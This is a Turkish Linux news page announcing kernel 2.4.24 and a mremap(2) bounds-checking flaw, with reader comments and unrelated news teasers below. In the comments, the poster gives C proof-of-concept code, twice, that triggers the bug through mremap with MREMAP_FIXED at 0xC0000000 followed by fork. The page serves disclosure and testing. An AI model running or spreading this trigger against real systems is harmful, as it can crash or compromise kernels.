Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Linus da artık fulltime fazlamesaici ;)
sundance
18 Haziran 2003, 1 dakika okuma süresi

Yaklaşık altı yıldır Transmeta için çalışmakta olan, Linux hareketinin öncüsü Linus Tornvalds, kernel listelerine dün attığı şu mesajla artık Transmeta şirketinden ayrıldığını ve tüm zamanını Linux kernele ayıracağını belirtmiş.

Zaten Transmetanın da çok nazik bir şekilde, kendisine bunca zaman kernel üzerinde çalışması için imkan tanıdığını fakat artık tüm zamanını buna adayabileceğini söylüyor. Hepimize hayırlı olsun diyelim. Kariyer meraklılarına özenle duyrulur :)

OpenBSD 2.9 Çıktı!
PCc0d3r
2 Haziran 2001, 1 dakika okuma süresi

OpenBSD 2.9 çıktı! Bilindiği gibi OpenBSD BSD çeşitleri arasında güvenliğe en çok önem veren işletim sistemleri arasında.
\r Daha fazla bilgi için: Release Notes ChangeLog

SLAX v5.0.4 duyuruldu
Soulblighter
27 Nisan 2005, 1 dakika okuma süresi

SLAX Live-CD'lerin yeni sürümlerini duyurdu. Standard sürümün yanında KillBill sürümü ve Frodo sürümleri de güncellendi.

Acil durumlarda: TOMSRTBT...
m1a2
13 Şubat 2002, 2 dakika okuma süresi

`The most GNU/Linux on 1 floppy disk.` motto`suyla TOMSRTBT yani `Tom Oehser`in minik pengueni karşınızda... Vector Linux bile bana fazla, şöyle tek floppy`e sığan üstelik `emacs`lı (!) tini-mini bir distro arıyorum derseniz, mutlaka bir bakın derim. Şimdi bir `rescue` operasyonunda kullandım ve pek bir memnun kaldım :)) (Tabii işin `emacs` tarafı beni ilgilendirmiyor, ama doğrusu bendenizin de ateşli bir mensubu olduğu `VI` cemaatinin `acil durumlarda sadece VI ile başbaşa kalacaksınız, emacs şişman bir iyi gün dostudur...` sözleri biraz havada kalmış oluyor galiba.)

XmlLinux--Türkiye nin ilk xml linux haber portalı
ghanthar
2 Aralık 2003, 1 dakika okuma süresi

XmlLinux sitesini açmış bulunuyorum. Sitenin işleyişi oldukça basit ancak pratik anlamda işlevsel olabileceği kanısındayım. Site nuke sistemleri tarafından yaratılan xml haber dosyalarını yayımlıyor. Pratik anlamda ise bu şu demek: Türkiye deki pek çok linux sitesinin haber başlıklarını (tüm haberler otomatik olarak saat başı güncellenmektedir) tek bir sayfadan okuyabiliyorsunuz. Yapmanız gereken tek şey başlığa tıklayarak okumak istediğiniz habere doğrudan gitmek ve okumak. Her gün bir dolu siteyi gezmekten kurtarabileceğini düşündüğüm basit bir sistem.
Ziyaret etmek için XmlLinux.ghanthar.net